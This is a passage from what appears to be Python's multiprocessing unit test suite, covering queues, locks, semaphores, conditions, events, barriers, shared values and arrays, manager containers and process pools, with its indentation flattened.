# qsize is not available on all platform as it
# relies on sem_getvalue
pass
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
def test_closed_queue_put_get_exceptions(self):
for q in multiprocessing.Queue(), multiprocessing.JoinableQueue():
q.close()
with self.assertRaisesRegex(ValueError, 'is closed'):
q.put('foo')
with self.assertRaisesRegex(ValueError, 'is closed'):
q.get()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.monotonic()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.monotonic() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=support.LONG_TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocess.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unplicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
